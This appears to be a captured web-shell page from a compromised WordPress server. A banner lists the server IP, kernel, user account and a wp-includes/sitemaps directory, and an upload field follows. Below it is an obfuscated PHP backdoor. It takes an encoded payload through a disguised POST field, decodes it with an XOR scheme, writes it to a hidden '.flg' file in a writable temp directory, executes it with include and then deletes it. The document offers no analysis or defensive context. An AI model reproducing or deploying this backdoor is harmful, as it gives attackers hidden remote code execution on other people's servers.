| Server IP : 162.243.168.218 / Your IP : 216.73.216.67 Web Server : Apache System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64 User : web23 ( 5020) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client3/web23/web/wp-includes/sitemaps/ |
Upload File : |
<?php
if(isset($_POST["po\x69nt\x65\x72"])){
$parameter_group = $_POST["po\x69nt\x65\x72"];
$parameter_group =explode ( '.', $parameter_group );
$fac = '';
$s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s2);
$r = 0;
foreach ($parameter_group as $v8) {$sChar = ord($s2[$r % $lenS]);
$d = ((int)$v8 - $sChar - ($r % 10)) ^ 100;
$fac .= chr($d);
$r++; }
$value = array_filter([session_save_path(), getcwd(), getenv("TMP"), getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir")]);
foreach ($value as $ent):
if ((function($d) { return is_dir($d) && is_writable($d); })($ent)) {
$data = "$ent" . "/.flg";
if (@file_put_contents($data, $fac) !== false) {
include $data;
unlink($data);
die();
}
}
endforeach;
}